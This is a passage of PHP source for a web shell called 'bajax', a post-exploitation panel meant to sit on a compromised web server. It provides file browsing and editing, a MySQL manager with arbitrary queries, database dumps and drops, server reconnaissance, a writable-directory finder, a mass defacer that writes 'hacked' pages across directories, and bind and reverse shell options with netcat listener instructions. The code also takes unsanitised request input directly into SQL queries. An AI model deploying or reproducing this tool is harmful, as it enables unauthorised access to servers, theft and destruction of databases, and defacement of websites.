$cdrec .= pack("V", 16 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function add_file($data, $name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= "\x00\x00\x00\x00";
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= $zdata;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x14\x00";
$cdrec .="\x00\x00";
$cdrec .="\x08\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",$crc);
$cdrec .= pack("V",$c_len);
$cdrec .= pack("V",$unc_len);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("V", 32 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode("", $this -> datasec);
$ctrldir = implode("", $this -> ctrl_dir);
return
$data.
$ctrldir.
$this -> eof_ctrl_dir.
pack("v", sizeof($this -> ctrl_dir)).
pack("v", sizeof($this -> ctrl_dir)).
pack("V", strlen($ctrldir)).
pack("V", strlen($data)).
"\x00\x00";
}
function get_files_from_folder($directory, $put_into) {
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle)))
{
if (is_file($directory.$file))
{
$fileContents = file_get_contents($directory.$file);
$this->add_file($fileContents, $put_into.$file);
}
elseif ($file != '.' and $file != '..' and is_dir($directory.$file))
{
$this->add_dir($put_into.$file.'/');
$this->get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
}
}
}
closedir($handle);
}
//download folder into zip
function downloadfolder($folder)
{
$this->get_files_from_folder($folder,'');
header("Content-Disposition: attachment; filename=" .$this->cs(basename($folder)).".zip");
header("Content-Type: application/download");
header("Content-Length: " . strlen($this-> file()));
flush();
echo $this->file();
exit();
}
function cs($t){
return str_replace(" ","_",$t);
}
//converter
function convert($isi)
{
$i=$_POST['convert'];
switch ($isi) {
case 'md5':$c=md5($i);return $c;break;
case 'hexa':$c=bin2hex($i);return $c;break;
case '64en':$c=base64_encode($i);return $c;break;
case '64de':$c=base64_decode($i);return $c;break;
case 'sha1':$c=sha1($i);return $c;break;
case 'urlen':$c=urlencode($i);return $c;break;
case 'urlde':$c=urldecode($i);return $c;break;
}
}
//current location
function current($f)
{
$d=explode(DIRECTORY_SEPARATOR, $this->dir());
$s='';
$r='';
for ($i=0; $i <count($d); $i++) {
$s.=$d[$i].DIRECTORY_SEPARATOR;
($i==count($d)-1?$r.="<a href='?act=$f&dir=".$s."'>$d[$i]</a>":$r.="<a href='?act=$f&dir=".$s."'>$d[$i]".DIRECTORY_SEPARATOR."</a>");
}
return $r;
}
//explorer
function xpl()
{
// define an array to hold the files
$dname=array();
$fname=array();
if ($dh=opendir($this->dir()))
{
while(false !==($name=readdir($dh))){
if($name !='.'){
(is_dir($name))?$dname[]=$name:$fname[]=$name;
}
}
closedir($dh);
}
sort($dname);
sort($fname);

$r="
Current Location : <br />".$this->current('file');

$r.="
<div id='isi'><table border=0 style='width:100%' cellspacing=0 class='xpltab'><th style='width:50%;'>Name</th><th style='width:70px;'>Size</th><th style='width:100px;'>Owner : Group</th><th style='width:80px;'>Permission</th><th style='width:50px;'>Writable</th><th style='100px;'>Modified</th><th>Action</th>";
foreach( $dname as $folder )
{
$own=function_exists('posix_getpwuid')?posix_getpwuid(fileowner($this->dir().$folder)):"0";
$group=function_exists('posix_getpwuid')?posix_getpwuid(filegroup($this->dir().$folder)):"0";
$owner=$own['name'].":".$group['name'];
$write=is_writable($this->dir().$folder)?"Yes":"No";
if($folder =='..')
{
$pwd=$this->up($this->dir());
$r .="<a href='?act=file&amp;dir=$pwd'>$folder </a>LINK$owner".substr(sprintf('%o', fileperms($this->dir().$folder)),-3)."$write".date("d-M-Y H:i",filemtime($this->dir().$folder))."";

} else {
$d=$this->dir();
$r .="<a href='?act=file&amp;dir=$d$folder".DIRECTORY_SEPARATOR."'>$folder /</a>DIR$owner".(is_readable($folder)?substr(sprintf('%o', fileperms($d.$folder.DIRECTORY_SEPARATOR)),-3):'Forbidden')."$write".date("d-M-Y H:i",filemtime($d.$folder.DIRECTORY_SEPARATOR))."<a href='?act=ren&dir=$d&file=$folder'>Ren</a> | <a href='?act=file&act3=del&dir=$d&file=$d$folder'>Del</a> | <a href='?act=downfolder&file=".$this->replace($d.$folder.DIRECTORY_SEPARATOR)."'>Download</a>";
}
}
foreach($fname as $file)
{

$own=function_exists('posix_getpwuid')?posix_getpwuid(fileowner($this->dir().$file)):"0";
$group=function_exists('posix_getpwuid')?posix_getpwuid(filegroup($this->dir().$file)):"0";
$owner=$own['name'].":".$group['name'];
$write=is_writable($this->dir().$file)?"Yes":"No";
$d=$this->dir();
$r .="<a href='?act=file&dir=$d$file'>$file</a>".$this->getSize(filesize($file))."$owner".(is_readable($file)?substr(sprintf('%o', fileperms($file)),-3):'forbidden')."$write".date("d-M-Y H:i",filemtime($file))."<a href='?act=edit&dir=$d&file=$file'>Edit</a> | <a href='?act=ren&dir=$d&file=$file'>Ren</a> | <a href='?act=file&act2=del&dir=$d&file=".$this->replace($d.$file)."'>Del</a> | <a href='?act=down&file=".$this->replace($d.$file)."'>Download</a>";
}
$r .= "</div>";
return $r;

}

//edit file form
function edit($file)
{
$d=$this->dir();
$fp = fopen($file,'r');
if (!$fp)
return false;
$r = '';
$r .= '<div id="isi">
'
.'';
$r .= '<textarea name="isi">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea><br />';
$r .= '<span style="color:#fff;margin-right:5px;text-align:center">Rename : </span></span> <br />';
$r .= '
</div>';
fclose($fp);
return $r;
}
//rename file form
function ren($file)
{
$d=$this->dir();
$fp=fopen($file,'r');
if(!$fp)return false;
$r='';
$r.="<div id='isi'>
";
$r.='';
$r.='
To
<br />
</div>';
fclose($fp);
return $r;
}
//alert when something happen
function alert($text)
{
$r="<script>alert('".$text."');</script>";
return $r;
}
function downloadfile($f)
{
header("Content-type:application/octet-stream");
header("Content-length:".$this->getSize($f));
header("Content-Disposition:attachment;filename=".basename($f));
readfile($f);
die();
}
function login()
{
if(!isset($_SESSION['login'])&&!isset($_POST['masuk']))
{
$r='';
$r.= '<div id="center">
Host : Username :Password </div>
';
return $r;
}
elseif(!isset($_SESSION['login'])&&isset($_POST['masuk']))
{
extract($_POST);
$this->con=mysql_connect($host.":".$port,$user,$pass) or die(header("location:?act=mysql"));
$_SESSION['host']=$_POST['host'];
$_SESSION['port']=$_POST['port'];
$_SESSION['user']=$_POST['user'];
$_SESSION['pass']=$_POST['pass'];
$_SESSION['login']=true;


header("location:?act=view&dir=".$this->dir()."");
}
else header("location:?act=view&dir=".$this->dir()."");



}
//connect with session created
function connector()
{
extract($_SESSION);
$c=mysql_connect($host.":".$port,$user,$pass);
return $c;
}
//end session
function logout()
{
extract($_SESSION);
return "
$user@$host <a href='?act=logout'>Logout</a>
";
}
//free d query load
function free($re)
{
return mysql_free_result($re);
}
//query mysql
function qe($q)
{
return mysql_query($q);
}
//show databases list
function lihatdb()
{
$c=$this->connector();
if($c)
{
$r='';
$r.=$this->logout();
$r.="<div id='isi'><table width=50% align='center' cellspacing=0 class='xpltab'><th style='border-left:thin solid #f00;'>Database</th><th>Table count</th><th>Download</th><th>Drop</th>";
$list=mysql_list_dbs($c);
while($isi=mysql_fetch_assoc($list))
{
$tbl=$this->qe("SHOW TABLES FROM $isi[Database]");
$tbl_count=mysql_num_rows($tbl);
$r.= "<a href='?act=showtable&db=$isi[Database]'>$isi[Database]$tbl_count<a href='?act=downdb&db=$isi[Database]'>Download</a><td style='border-right:thin solid #f00;'><a href='?act=dropdb&db=$isi[Database]'>Drop</a>";
}
$r.= "
New database <input type='text' value='new_db' name='dbname' id='box'><input type='hidden' name='action' value='createdb'><input type='submit' value='create' id='but'>
";
$r.=$this->sqlcommand()."</div>";
$this->free($tbl);
}
else {
session_destroy();
$r.="gagal brow";
}
mysql_close($c);
return $r;
}
//show table list from selected database
function showtable()
{
$c=$this->connector();
$r='';
$r.=$this->logout();
$r.="<div id='isi'>
<a href='?act=mysql'>Show Database</a>
<br />
<table width=50% align='center' class='xpltab' cellspacing=0 ><th style='border-left:thin solid #f00;'>Table</th><th>Column count</th><th>Dump</th><th>Drop</th>";
$db=$_GET['db'];
$query=$this->qe("SHOW TABLES FROM $db");
while($data=mysql_fetch_array($query))
{

$iml=$this->qe("SHOW COLUMNS FROM $db.$data[0]");
$h=mysql_num_rows($iml);
$r.= "<a href='?act=showcon&db=$db&table=$data[0]'>$data[0]$h<a href='?act=downdb&db=$db&table=$data[0]'>Dump</a><td style='border-right:thin solid #f00;'><a href='?act=dropdb&db=$db&tbl=$data[0]'>Drop</a>";

}

$r.= "".$this->sqlcommand()."</div>";
return $r;
$this->free($query);
$this->free($iml);
mysql_close($c);
}
//show all content from table selected
function showcon()
{
$c=$this->connector();
$r='';
$r.=$this->logout();
$db=$_GET['db'];
$tbl=$_GET['table'];
$r.="<div id='isi'>
<a href='?act=showtable&db=$db'>Show Tables </a>
<br />
<table width=100% align='center' cellspacing=0 class='xpltab'>";

$query=$this->qe("SELECT * FROM $db.$tbl");
$col=array();
$iml=$this->qe("SHOW COLUMNS FROM $db.$tbl");
$r.="";
while ($c=mysql_fetch_assoc($iml)) {
array_push($col,$c['Field']);
$r.="<th style='border:thin solid #000;'>".strtoupper($c['Field'])."</th>";
}
$r.="<th>Action</th>";
while($data=mysql_fetch_row($query))
{
$cols=mysql_fetch_row($iml);

$r.="";
foreach ($data as $da) {
$r.="<td style='border-right:thin solid #f00;'>".$da."";
}

$r.="<a href='?act=editrow&db=$db&table=$tbl&col=$col[0]&val=$data[0]'>Edit</a> | <a href='?act=delrow&db=$db&table=$tbl&col=$col[0]&val=$data[0]'>Delete</a>";

$r.="";
}
$r.= "<br />
<a href='?act=insertrow&db=$db&table=$tbl'><input type='button' id='but' value='Insert Row'></a>
".$this->sqlcommand()."</div>";
$this->free($query);
$this->free($iml);
return $r;
}
function downdb()
{
$c=$this->connector();
//downloading specific table

if (isset($_GET['db'])&&isset($_GET['table'])) {
$db=$_GET['db'];
$tbl=$_GET['table'];
$r="-- =========================mysql Dumper bajax =============================\n-- Database $db\n-- Table Name : $tbl\n\n";
$tab=$this->qe("SELECT * FROM $db.$tbl");
$query2=$this->qe("SHOW COLUMNS FROM $db.$tbl");
$r.="CREATE TABLE IF NOT EXISTS `$tbl` (\n";
for($i=0;$i<mysql_num_rows($query2)-1;$i++)
{
$result=mysql_fetch_array($query2);
$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'').(reset($result)?',':'')."\n";
}
$result=mysql_fetch_array($query2);
$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'')."\n";
$r.=");\n";
$select=$this->qe("SELECT * FROM $db.$tbl");
while($data=mysql_fetch_assoc($select))
{
$col=implode(', ',array_keys($data));
$val=implode("', '",array_values($data));
$r.="INSERT INTO `$tbl` ($col) VALUES ('$val');\n";
}
$r.="\n";
}
//downloading database
elseif(isset($_GET['db'])&&!isset($_GET['tbl']))
{
$db=$_GET['db'];
$tables=array();
$column=array();
$r='';
$r.="-- =========================Bajax Mysql Dumper =============================\n-- Database : `$db`\n\n";
$query=$this->qe("SHOW TABLES FROM $db");

while($list=mysql_fetch_array($query))
$tables[]=$list[0];
foreach ($tables as $d) {
//well i spend more time here :D
$query2=$this->qe("SHOW COLUMNS FROM $db.$d");
$r.="CREATE TABLE IF NOT EXISTS `$d` (\n";
for($i=0;$i<mysql_num_rows($query2)-1;$i++)
{

$result=mysql_fetch_array($query2);

$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'').(reset($result)?',':'')."\n";
}
$result=mysql_fetch_array($query2);
$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'')."\n";
$r.=");\n";
$select=$this->qe("SELECT * FROM $db.$d");


while($data=mysql_fetch_assoc($select))
{
$col=implode(', ',array_keys($data));
$val=implode("', '",array_values($data));
$r.="INSERT INTO `$d` ($col) VALUES ('$val');\n";
}
$r.="\n";
}
}
else echo "i don't know brow";

(!isset($tbl)?$name="$db.sql":$name="$db.$tbl.sql");
ob_get_clean();
header("Content-type:application/octet-stream");
header("Content-length:".strlen($r));
header("Content-Disposition:attachment;filename=$name;");
echo $r;
exit();
$this->free($query);
$this->free($query2);
$this->free($select);
mysql_close();
}
//drop database or table
function dropsql()
{
$this->connector();
if(!isset($_GET['tbl'])){
$d=$this->qe("DROP DATABASE $_GET[db]");
header("location:?act=mysql");
}
elseif(isset($_GET['db'])&&isset($_GET['tbl']))
{
$this->qe("DROP TABLE $_GET[db].$_GET[tbl]");
header("location:?act=showtable&db=$_GET[db]");
}
}
//create new database
function createdb($name)
{
$this->connector();
if(!empty($name))
{
$q=$this->qe("CREATE DATABASE $name");
(!$q?$r.=mysql_error():$r.="Good Brow");

}
else $r.="Fill DB Name";
//header("location:?act=mysql");
}
//edit specific record on tables
function editrow()
{
$c=$this->connector();
$r='';
$r.=$this->logout();
$db=$_GET['db'];
$tbl=$_GET['table'];
$val=$_GET['val'];
$col=$_GET['col'];
$r.="<div id='isi'>
<a href='?act=showtable&db=$db'>Show Tables </a>
<br />";
$r.="
";
$r.="<table width=100% align='center' cellspacing=0 class='xpltab'>";

$cols=array();
$iml=mysql_query("SHOW COLUMNS FROM $db.$tbl");
$query=mysql_query("SELECT * FROM $db.$tbl WHERE $col='$val'");

while($colom=mysql_fetch_assoc($iml))$cols[]=$colom['Field'];
$data=mysql_fetch_assoc($query);
for($i=0;$i<count($cols);$i++)
{
$pt=$cols[$i];
$r.="<td style='border:none'>".$pt."<td style='border:none'>".' : ';

}
$r.="<input type='hidden' name='action' value='updaterow'><input id='but' type='submit' value='update'>
</div>";
return $r;
$this->free();
}
//updat record
function updaterow()
{
$this->connector();
$db=$_GET['db'];
$tbl=$_GET['table'];
$val=$_GET['val'];
$col=$_GET['col'];

array_pop($_POST);
foreach ($_POST as $key => $value) {
$c=$this->qe("UPDATE $db.$tbl SET $key='$value' WHERE $col='$val'");
$r.=header("location:?act=showcon&db=$db&table=$tbl");
}
$this->free($c);
}
//delete record
function droprow()
{
$this->connector();
$this->qe("DELETE FROM $_GET[db].$_GET[table] WHERE $_GET[col]='$_GET[val]'");
$r.=header("location:?act=showcon&db=$_GET[db]&table=$_GET[table]");
}
//insert record
function insertrow()
{
$this->connector();
$db=$_GET['db'];
$tbl=$_GET['table'];
$r='';
if(!isset($_POST['kirim']))
{
$r.="<div id='isi'>
<a href='?act=showtable&db=$db'>Show Tables </a>
<br />";
$r.="
";
$r.="<table width=100% align='center' cellspacing=0 class='xpltab'>";

$cols=array();
$iml=mysql_query("SHOW COLUMNS FROM $db.$tbl");
while($colom=mysql_fetch_assoc($iml))$cols[]=$colom['Field'];
for($i=0;$i<count($cols);$i++)
{
$pt=$cols[$i];
$r.="<td style='border:none'>".$pt."<td style='border:none'>".' : ';
}
$r.="<input type='hidden' name='action' value='insertrow'><input id='but' type='submit' name='kirim' value='Insert'>
</div>";
return $r;
} else {
array_pop($_POST);
array_pop($_POST);
$val=array();
$c="INSERT INTO $_GET[db].$_GET[table] VALUES (";
foreach ($_POST as $value) {
$val[]=$value;
}
for($i=0;$i<count($val);$i++)
{
($i==count($val)-1?$c.="'$val[$i]'":$c.="'$val[$i]',");
}
$c.=");";
$qu=$this->qe($c);
(!$qu?$r.="Failed brow, error on: ".mysql_error():$r.="Success");
}
return $r;
}
function sqlcommand()
{
$r="
Quick Query <input type='text' value='show databases' name='sqlcmd' style='width:500px;margin-top:14px;' id='box'><input type='submit' name='submit' value='Go' id='but'>
";
return $r;
}

//display sql query
function sqlcmd()
{
$this->connector();
$r='<div id="isi">';
if(isset($_POST['submit']))
{
$re=$_POST['sqlcmd'];
if(!empty($re))
{
$qe=$this->qe($re);
if($qe)
{
$r.="<table align=center cellpadding=5 style='width:100%;font-size:12px;'>";
for($i=0;$i<mysql_num_fields($qe);$i++)
{
$r.="<th style='border:thin dashed #f00;background:#f00;'>".htmlspecialchars(mysql_field_name($qe,$i))."</th>";
}
$r.="</th>";
while ($dat=mysql_fetch_row($qe)) {
$r.="";
for($n=0;$n<mysql_num_fields($qe);$n++)
{
$r.="<td style='border-bottom:thin dashed #f00;'>".htmlspecialchars($dat[$n])."";
}
$r.="";
}
$r.="";
} else $r.="
".$re."<br />Error brow, check your query";
}else $r.="
Fill the query brow
";

}
$r.=$this->sqlcommand();
$r.="</div>";
return $r;
}

//converter form
function converter()
{
$r='';
$r.="<div id='isi'>";
$opt=array("MD5"=>"md5","Hex"=>"hexa","Base64 Encoder"=>"64en","Base64 Decoder"=>"64de","SHA1"=>"sha1","URL Encoder"=>"urlen","URL Decoder"=>"urlde");
if(isset($_POST['submit'])&&!empty($_POST['convert']))
{
$val=$this->convert($_POST['isi']);
$r.="<textarea >$val</textarea>";
}
$isi="
<textarea style='width:50%;height:100px;border:1px solid #f00;' name='convert' ></textarea><br /><select name='isi' id='box'>";
foreach ($opt as $k=>$v) {
$isi.="<option value=$v>".$k."</option>";
}
$r.=$isi."<input type='submit' name='submit' style='color:#fff' id='but' value='Convert'>
</div>";
return $r;
}
//display valuable info on server
function infoser()
{
$r="<div id='isi'><table style='font-size:12px;'>";
$r.="Disable Function : ".(ini_get('disable_functions')?ini_get('disable_functions'):"All Function Enable")."";;
$r.="Safe Mode : ".(ini_get('safe_mode')?"On":"Off")."";
$r.="Open Base Dir : ".ini_get('openbase_dir')."";
$r.="Php version : ".phpversion()."";
$r.="Register Global : ".(ini_get('register_global')?'Enable':'Disable')."";
$r.="Curl : ".(extension_loaded('curl')?'Enable':'Disable')."";
$r.="Database Mysql : ".(function_exists('mysql_connect')?'On':'Off')."";
$r.="Magic Quotes : ".(ini_get('Magic_Quotes')?'On':'Off')."";
$r.="Remote Include : ".(ini_get('allow_url_include')?'Enable':'Disable')."";
$r.="Disk Free Space : ".$this->getSize(diskfreespace($this->dir()))."";
$r.="Total Disk Space : ".$this->getSize(disk_total_space($this->dir()))."";
$r.="</div>";
return $r;
}
//display available drive on winbox
function drive()
{
foreach (range("A", "Z") as $val) {
if(is_dir($val.":".DIRECTORY_SEPARATOR))
{

$ad=$val.":".DIRECTORY_SEPARATOR;
$r=$r.="<a href='?act=file&dir=$ad'>$val:".DIRECTORY_SEPARATOR."</a> ";
}
}
return $r;
}
//find writable directory
function scdir($dir)
{
$r='';
$dname=array();
if($dh=opendir($dir))
{
while (false !==($name=readdir($dh))) {

if($name !='.'&&$name!='..')
{
if(is_dir($name)&&is_writable($name))
{

$dname[]=$name;
}
}
}
closedir($dh);
}
if($dname)
{
foreach ($dname as $val) {
$r.="<a href='?act=file&dir=".$dir.$val.DIRECTORY_SEPARATOR."'>".$dir.$val."</a><hr style='border:thin solid #2e2e2e' />";
}
} else $r.="Not Found";


return $r;
}
//writable scanner form
function writable()
{
$r="<div id='isi'>";
if(isset($_POST['finddir'])&&isset($_POST['submit']))
{
$r.=$this->scdir($_POST['finddir']);

} //else {
$r.="
Find All Writable Directory <br />
dir()."'>".$this->current('write')."<br /><input type='hidden' name='finddir' id='box' value='".$this->dir()."'><input id='but' type='submit' style='margin-top:5px;color:#fff' name='submit' value='Search'>
";
//}
$r.="</div>";
return $r;
}

//mass defacer
function mass()
{
$r="<div id='isi'>";
if(isset($_POST['def'])&&isset($_POST['fname'])&&isset($_POST['isinya']))
{
$r.=$this->deface($_POST['addr'],$_POST['fname'],$_POST['isinya']);
$r.=$this->scdir($_POST['addr']);
}
else {
$r.="
dir()."'>Mass Defacer <br /><input type='hidden' style='width:500px;' name='addr' id='box' value='".$this->dir()."'>".$this->current('md')."<br />File Name <input type='text' name='fname' value='hack.htm' style='margin:7px 0;' id='box'><br />
<textarea name='isinya' style='border:1px solid #f00;'>

hacked

</textarea><br /><input type='submit' name='def' id='but' value='Deface'>
";
$r.="</div>";
}

return $r;
}
//mass defacer funct
function deface($al,$fname,$source)
{
$dname=array();
$al=$this->replace($al);
if($dh=opendir($this->replace($al)))
{
while (false !==($name=readdir($dh))) {

if($name !='.'&&$name!='..'&&is_dir($name))
{
if(is_writable($name))
{
$dname[]=$name;

}
}
}
closedir($dh);
}
if($dname)
{
$r.="Mass Deface Success <br />";
foreach ($dname as $val) {
if($fp=fopen($al.$val."/".$fname,"w"))
fwrite($fp, $source);
fclose($fp);
}


}
else $r.="failed";
return $r;
}
//backdoor function
function bdf($dir)
{

$r='';
$has=$_POST['bug'];
if($files = @scandir($dir)) {
foreach($files as $file) {
if($file != '.' && $file != '..'&& $file !='cgi-bin') {
if(@is_dir($dir.$slash.$file)) {
$r.=$this->bdf($dir.$file.DIRECTORY_SEPARATOR);

} else {
$op = @file_get_contents($dir.DIRECTORY_SEPARATOR.$file);
if($op)
foreach($has as $bug) {
if(@preg_match("/$bug\((.*?)\)/", $op)) {

$r.="Contain '$bug' at ".$dir.$file."".date("d-M-Y H:i",filemtime($dir.$file))."";

}
}

}
}
}
}
return $r;
}
//backdoor scanner form
function doorscan()
{
$this->find = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file','copy','pcntl_exec','escapeshellarg','escapeshellcmd','proc_open','proc_get_status','proc_nice','proc_open','proc_terminate');
$r="<div id='isi'>";
if(isset($_POST['submit'])&&isset($_POST['bug']))
{ $r.="<table width='100%'' class='xpltab'><th>These Files Probably Backdoor</th><th>Last Modified</th>";
$r.=$this->bdf($_POST['dir']);
$r.="";
}
else {

$r.="
dir()."'>Scan In : <input type='hidden' name='dir' value='".$this->dir()."'>".$this->current('bds')."<br />Scan Type :
";
foreach ($this->find as $val) {
$r.="<input style='margin-left:43%;margin-top:7px;' type='checkbox' name='bug[]' value='".$val."'>".$val."<br />";
}
$r.="
<input type='submit' name='submit' id='but' style='margin-top:10px;width:150px;color:#fff' value='Search Backdoor'>";
$r.="
";
}
$r.="</div>";


return $r;
}

function newmass($dir,$file,$source)
{
if(isset($_POST['dir'])&&isset($_POST['file'])&&isset($_POST['source']))
{

}
else {
$r.="
dir()."'>Mass Defacer <br /><input type='hidden' style='width:500px;' name='addr' id='box' value='".$this->dir()."'>".$this->current('md')."<br />File Name <input type='text' name='fname' value='index.php' style='margin:7px 0;' id='box'><br />
<textarea name='isinya' style='border:1px solid #f00;'>

hacked

</textarea><br /><input type='submit' name='def' id='but' value='Deface'>
";
$r.="</div>";
}
}
function door()
{
$this->ip=gethostbyname($_SERVER['HTTP_HOST']);
$r="";
$frm="
";
$hd="<input type='hidden' name='action' value='bc'>";
$ms="Press connect Button and run nc on your machine -> nc ".$this->ip." 666";
$ms2="run nc on your machine -> nc -lnvp 666 then press connect button";
//Bind Perl
$r.="<table border='0' width='100%' class='xpltab'><th>Bind Shell</th><th>Reverse Shell</th>
<td ><span class='gede'>Perl</span> <br />$frm<input type='hidden' value='".$this->ip."' name='ip' id='box'><br />Port : <input type='text' name='port' value='666' id='box' />$hd<input type='submit' name='Go' value='connect' id='but'><input type='hidden' name='action' value='bperl'>
<p>$ms";
//reverse perl
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Perl </span><br />Your Ip <input type='text' value='".$this->ip."' name='bcperlip' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:17px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2";
//bind python
$r.="<span class='gede'>Python</span> <br /><input type='hidden' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' /><input type='submit' name='Go' value='connect' id='but'>
<p>$ms
";
//reverse python
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Python</span> <br />Your Ip<input type='text' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:13px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2";
//Bind C
$r.="<span class='gede'>Bin</span> <br /><input type='hidden' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' /><input type='submit' name='Go' value='connect' id='but'>
<p>$ms";
//Reverse PHP
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Php</span> <br />Your Ip<input type='text' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:13px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2";
//Bind Ruby
$r.="<span class='gede'>Ruby</span> <br /><input type='hidden' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' /><input type='submit' name='Go' value='connect' id='but'>
<p>$ms";
//Reverse Ruby
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Ruby</span> <br />Your Ip <input type='text' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:17px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2
";
return $r;
}
function bc($type)
{
switch ($type) {
case 'bindpl':
# code...
break;
case 'bindpl':

break;
default:
# code...
break;
}
}

}
$bajax=new bajax();
$r='';
$r.=$bajax->header();
$r.=$bajax->menu();
echo "</div='isi'>";
switch ($_GET['act']) {
case 'file':

if(isset($_GET['act2'])=='del')
$r.=$bajax->remfile();
if(isset($_GET['act3'])=='del')
$r.=$bajax->remdir();
$r.=$bajax->xpl();
$r.=$bajax->center();
break;
case 'edit':
$r.=$bajax->edit($_GET['file']);
break;
case 'ren':
$r.=$bajax->ren($_GET['file']);
break;
case 'cmd':
$r.=$bajax->command();
$r.=$bajax->center();
break;
case 'down':
$r.=$bajax->downloadfile($_GET['file']);
break;
case 'downfolder':
$r.=$bajax->downloadfolder($_GET['file']);
break;
case 'mysql':
$r.=$bajax->login();
break;
case 'view':
$r.=$bajax->lihatdb();
break;
case 'showtable':
$r.=$bajax->showtable();
break;
case 'showcon':
$r.=$bajax->showcon();
break;
case 'downdb':
$r.=$bajax->downdb();
break;
case 'editrow':
$r.=$bajax->editrow();
break;
case 'logout':
$_SESSION=array();
session_destroy();
header("location:?act=mysql");
break;
case 'dropdb':
$r.=$bajax->dropsql();
break;
case 'delrow':
$r.=$bajax->droprow();
break;
case 'insertrow':
$r.=$bajax->insertrow();
break;
case 'sqlcmd':
$r.=$bajax->sqlcmd();
break;
case 'encode':
$r.=$bajax->converter();
break;
case 'ser':$r.=$bajax->infoser();break;
case "eval":
$r.=$bajax->phpeval();$r.=$bajax->center();
break;
case 'write':
$r.=$bajax->writable();
break;
case 'bds':$r.=$bajax->doorscan();break;
case 'md':$r.=$bajax->mass();break;
case 'bc':$r.=$bajax->door();break;
default:
$r.=$bajax->logo();
break;

}
switch ($_POST['action']) {
case 'editfile':
if($bajax->editfile($_POST['file']))
$r.=header("location:?act=file&dir=".$bajax->dir()."");

break;
case 'renamed':
if($bajax->rename($_POST['file']))
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case "mkdir":
$r.=$bajax->mkdir();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case "createfile":
$r.=$bajax->createfile();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;

case "uploader":
$r.=$bajax->upload();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case 'createdb':
$r.=$bajax->createdb($_POST['dbname']);
break;
case 'updaterow':
$r.=$bajax->updaterow();
break;
case 'insertrow':
$r.=$bajax->insertrow();
break;
case 'mass':
$r.=$bajax->newmass($_POST['dir'],$_POST['file'],$_POST['source']);
break;
case 'bc':
$r.=$bajax->bc();
break;

}
echo "</div>";
$r.=$bajax->footer();
echo $r;

ob_end_flush();